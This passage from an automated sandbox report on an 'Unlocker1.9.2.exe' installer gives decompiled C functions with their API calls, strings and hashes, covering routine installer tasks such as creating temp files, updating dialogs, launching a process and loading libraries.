                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                              • String ID: C:\Program Files\Unlocker
                                                                                                                                                              • API String ID: 3751793516-1747243819
                                                                                                                                                              • Opcode ID: eca45e4f265b5310bf3876cc38f450248989b20858a3f8b45370c7433c2b44d3
                                                                                                                                                              • Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
                                                                                                                                                              • Opcode Fuzzy Hash: eca45e4f265b5310bf3876cc38f450248989b20858a3f8b45370c7433c2b44d3
                                                                                                                                                              • Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004056E3(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                                                              				signed int _t11;
                                                                                                                                                              				int _t14;
                                                                                                                                                              				signed int _t16;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				CHAR* _t20;
                                                                                                                                                              
                                                                                                                                                              				_t20 = _a4;
                                                                                                                                                              				_t19 = 0x64;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t19 = _t19 - 1;
                                                                                                                                                              					_a4 = 0x61736e;
                                                                                                                                                              					_t11 = GetTickCount();
                                                                                                                                                              					_t16 = 0x1a;
                                                                                                                                                              					_a6 = _a6 + _t11 % _t16;
                                                                                                                                                              					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                                                                                                              					if(_t14 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t19 != 0) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					 *_t20 =  *_t20 & 0x00000000;
                                                                                                                                                              					return _t14;
                                                                                                                                                              				}
                                                                                                                                                              				return _t20;
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004056F6
                                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                              • API String ID: 1716503409-1276116323
                                                                                                                                                              • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                                                              • Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
                                                                                                                                                              • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                                                              • Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E00404568(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                                                              				char _v36;
                                                                                                                                                              				char _v68;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t26;
                                                                                                                                                              				int _t29;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				signed int _t36;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				unsigned int _t46;
                                                                                                                                                              
                                                                                                                                                              				_t46 = _a12;
                                                                                                                                                              				_push(0x14);
                                                                                                                                                              				_pop(0);
                                                                                                                                                              				_t34 = 0xffffffdc;
                                                                                                                                                              				if(_t46 < 0x100000) {
                                                                                                                                                              					_push(0xa);
                                                                                                                                                              					_pop(0);
                                                                                                                                                              					_t34 = 0xffffffdd;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t46 < 0x400) {
                                                                                                                                                              					_t34 = 0xffffffde;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t46 < 0xffff3333) {
                                                                                                                                                              					_t39 = 0x14;
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					_t46 = _t46 + 1 / _t39;
                                                                                                                                                              				}
                                                                                                                                                              				_push(E004059FF(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                                                                                                              				_push(E004059FF(_t34, 0, _t46,  &_v68, _t34));
                                                                                                                                                              				_t21 = _t46 & 0x00ffffff;
                                                                                                                                                              				_t36 = 0xa;
                                                                                                                                                              				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                                                                                                              				_push(_t46 >> 0);
                                                                                                                                                              				_t26 = E004059FF(_t34, 0, 0x420478, 0x420478, _a8);
                                                                                                                                                              				wsprintfA(_t26 + lstrlenA(0x420478), "%u.%u%s%s");
                                                                                                                                                              				_t29 = SetDlgItemTextA( *0x423658, _a4, 0x420478); // executed
                                                                                                                                                              				return _t29;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00420478,00420478,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404488,000000DF,0000040F,00000400,00000000), ref: 004045F6
                                                                                                                                                              • wsprintfA.USER32 ref: 004045FE
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00404611
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                              • Opcode ID: fbb595e432194c305246c6f0f4e29bd605609ecb9101d11c6153431d6f6663c0
                                                                                                                                                              • Instruction ID: de100ae33fd703a766e80fabf1c0ef7e237f6bef08e04a4196497c65211e5d03
                                                                                                                                                              • Opcode Fuzzy Hash: fbb595e432194c305246c6f0f4e29bd605609ecb9101d11c6153431d6f6663c0
                                                                                                                                                              • Instruction Fuzzy Hash: 331104B370012477DB10666D9C05EAF329DDBC6334F14023BFA2AF61D1E9388C1186E8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E00401BAD() {
                                                                                                                                                              				signed int _t28;
                                                                                                                                                              				CHAR* _t31;
                                                                                                                                                              				long _t32;
                                                                                                                                                              				int _t37;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              				int _t42;
                                                                                                                                                              				int _t48;
                                                                                                                                                              				struct HWND__* _t52;
                                                                                                                                                              				void* _t55;
                                                                                                                                                              
                                                                                                                                                              				 *(_t55 - 0x34) = E004029D9(3);
                                                                                                                                                              				 *(_t55 + 8) = E004029D9(4);
                                                                                                                                                              				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                                                                                                                                              					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
                                                                                                                                                              				}
                                                                                                                                                              				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                                                                                                                                              				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                                                                                                                                              					 *(_t55 + 8) = E004029F6(0x44);
                                                                                                                                                              				}
                                                                                                                                                              				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                                                                                                                                              				_push(1);
                                                                                                                                                              				if(__eflags != 0) {
                                                                                                                                                              					_t50 = E004029F6();
                                                                                                                                                              					_t28 = E004029F6();
                                                                                                                                                              					asm("sbb ecx, ecx");
                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                              					_t31 =  ~( *_t27) & _t50;
                                                                                                                                                              					__eflags = _t31;
                                                                                                                                                              					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
                                                                                                                                                              					goto L10;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t52 = E004029D9();
                                                                                                                                                              					_t37 = E004029D9();
                                                                                                                                                              					_t48 =  *(_t55 - 0x10) >> 2;
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8)); // executed
                                                                                                                                                              						L10:
                                                                                                                                                              						 *(_t55 - 8) = _t32;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                              						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                                                                                                                                                              				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                                                                                                                                                              					_push( *(_t55 - 8));
                                                                                                                                                              					E0040593B();
                                                                                                                                                              				}
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t55 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}













                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                              • String ID: !
                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                              • Opcode ID: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                                                                                              • Instruction ID: 089b6e11c3ee5c2ceb15467343933f82bc3488a694e04e66c57418204d538f9a
                                                                                                                                                              • Opcode Fuzzy Hash: a21e9fedaf10b3d0faf8ff8eb7872d1ba6ab3a41dfe2fcd52b90142743086bd6
                                                                                                                                                              • Instruction Fuzzy Hash: B321C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040523D(CHAR* _a4) {
                                                                                                                                                              				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                              				int _t7;
                                                                                                                                                              
                                                                                                                                                              				0x422480->cb = 0x44;
                                                                                                                                                              				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422480,  &_v20); // executed
                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                              					CloseHandle(_v20.hThread);
                                                                                                                                                              					return _v20.hProcess;
                                                                                                                                                              				}
                                                                                                                                                              				return _t7;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040526F
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040523D
                                                                                                                                                              • Error launching installer, xrefs: 00405250
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                                                                              • API String ID: 3712363035-1785902839
                                                                                                                                                              • Opcode ID: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                                                                                              • Instruction ID: 0a3d69d2a3401d9d63374a1600280413a6fd3692a6ba6d2da32d4f839eaa01ec
                                                                                                                                                              • Opcode Fuzzy Hash: 1f2f9ff3088062fdf2c67fe66ccdb0f341c5896b9e6aafa6ba1adbb34377fffc
                                                                                                                                                              • Instruction Fuzzy Hash: BEE0E674A1010ABBDB00EF64DD09D6B7B7CFB00304B408621E911E2150D774E4108A79
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00401F51(void* __ebx, void* __eflags) {
                                                                                                                                                              				struct HINSTANCE__* _t18;
                                                                                                                                                              				struct HINSTANCE__* _t26;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				struct HINSTANCE__* _t30;
                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              
                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                              				asm("sbb eax, 0x423f38");
                                                                                                                                                              				 *(_t34 - 4) = 1;
                                                                                                                                                              				if(__eflags < 0) {
                                                                                                                                                              					_push(0xffffffe7);
                                                                                                                                                              					L15:
                                                                                                                                                              					E00401423();
                                                                                                                                                              					L16:
                                                                                                                                                              					 *0x423f08 =  *0x423f08 +  *(_t34 - 4);
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t32 = E004029F6(0xfffffff0);
                                                                                                                                                              				 *(_t34 + 8) = E004029F6(1);
                                                                                                                                                              				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
                                                                                                                                                              					L3:
                                                                                                                                                              					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                                                                                              					_t30 = _t18;
                                                                                                                                                              					if(_t30 == _t27) {
                                                                                                                                                              						_push(0xfffffff6);
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					L4:
                                                                                                                                                              					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                                                              					if(_t33 == _t27) {
                                                                                                                                                              						E00404D7B(0xfffffff7,  *(_t34 + 8));
                                                                                                                                                              					} else {
                                                                                                                                                              						 *(_t34 - 4) = _t27;
                                                                                                                                                              						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
                                                                                                                                                              							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40af50, 0x409000); // executed
                                                                                                                                                              						} else {
                                                                                                                                                              							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
                                                                                                                                                              							if( *_t33() != 0) {
                                                                                                                                                              								 *(_t34 - 4) = 1;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004034C6(_t30) != 0) {
                                                                                                                                                              						FreeLibrary(_t30); // executed
                                                                                                                                                              					}
                                                                                                                                                              					goto L16;
                                                                                                                                                              				}
                                                                                                                                                              				_t26 = GetModuleHandleA(_t32); // executed
                                                                                                                                                              				_t30 = _t26;
                                                                                                                                                              				if(_t30 != __ebx) {
                                                                                                                                                              					goto L4;
                                                                                                                                                              				}
                                                                                                                                                              				goto L3;
                                                                                                                                                              			}










                                                                                                                                                              0x00401ff2
                                                                                                                                                              0x00401f7c
                                                                                                                                                              0x00401f82
                                                                                                                                                              0x00401f86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00402F8B,00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000), ref: 00404DD7
                                                                                                                                                                • Part of subcall function 00404D7B: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\), ref: 00404DE9
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2987980305-0
                                                                                                                                                              • Opcode ID: 71306b1134231061c89694e0e173e72c12ff72d2ee8c3f8387a1942ab3f7262f
                                                                                                                                                              • Instruction ID: d4347cebb671b603d0a5d412fc90ce50d757f993dc699470b494ace3858b78d6
                                                                                                                                                              • Opcode Fuzzy Hash: 71306b1134231061c89694e0e173e72c12ff72d2ee8c3f8387a1942ab3f7262f
                                                                                                                                                              • Instruction Fuzzy Hash: 7221EE72D04216ABCF107FA4DE89A6E75B06B44359F204337F611B52E0D77C4941965E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00404CCB(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                              				long _t13;
                                                                                                                                                              				long _t22;
                                                                                                                                                              
                                                                                                                                                              				if(_a8 != 0x102) {
                                                                                                                                                              					if(_a8 != 0x200) {
                                                                                                                                                              						_t22 = _a16;
                                                                                                                                                              						L7:
                                                                                                                                                              						if(_a8 == 0x419 &&  *0x420460 != _t22) {
                                                                                                                                                              							 *0x420460 = _t22;
                                                                                                                                                              							E004059DD(0x420478, 0x424000);
                                                                                                                                                              							E0040593B(0x424000, _t22);
                                                                                                                                                              							E0040140B(6);
                                                                                                                                                              							E004059DD(0x424000, 0x420478);
                                                                                                                                                              						}
                                                                                                                                                              						L11:
                                                                                                                                                              						_t13 = CallWindowProcA( *0x420468, _a4, _a8, _a12, _t22); // executed
                                                                                                                                                              						return _t13;
                                                                                                                                                              					}
                                                                                                                                                              					if(IsWindowVisible(_a4) == 0) {
                                                                                                                                                              						L10:
                                                                                                                                                              						_t22 = _a16;
                                                                                                                                                              						goto L11;
                                                                                                                                                              					}
                                                                                                                                                              					_t22 = E0040464A(_a4, 1);
                                                                                                                                                              					_a8 = 0x419;
                                                                                                                                                              					goto L7;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a12 != 0x20) {
                                                                                                                                                              					goto L10;
                                                                                                                                                              				}
                                                                                                                                                              				E00403DDB(0x413);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00404D01
                                                                                                                                                              • CallWindowProcA.USER32 ref: 00404D6F
                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageA.USER32(0014005A,00000000,00000000,00000000), ref: 00403DED
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                              • Opcode ID: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                                                                                              • Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
                                                                                                                                                              • Opcode Fuzzy Hash: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                                                                                              • Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                              			E004055B1(void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				int _t11;
                                                                                                                                                              				signed char* _t12;
                                                                                                                                                              				long _t16;
                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              
                                                                                                                                                              				E004059DD(0x421880, _a4);
                                                                                                                                                              				_t21 = E00405564(0x421880);
                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                              					E00405C3F(_t21);
                                                                                                                                                              					if(( *0x423e98 & 0x00000080) == 0) {
                                                                                                                                                              						L5:
                                                                                                                                                              						_t22 = _t21 - 0x421880;
                                                                                                                                                              						while(1) {
                                                                                                                                                              							_t11 = lstrlenA(0x421880);
                                                                                                                                                              							_push(0x421880);
                                                                                                                                                              							if(_t11 <= _t22) {
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							_t12 = E00405CD8();
                                                                                                                                                              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                                                              								E00405517(0x421880);
                                                                                                                                                              								continue;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L1;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						E004054D0();
                                                                                                                                                              						_t16 = GetFileAttributesA(??); // executed
                                                                                                                                                              						return 0 | _t16 != 0xffffffff;
                                                                                                                                                              					}
                                                                                                                                                              					_t18 =  *_t21;
                                                                                                                                                              					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                                                              						goto L1;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L5;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				L1:
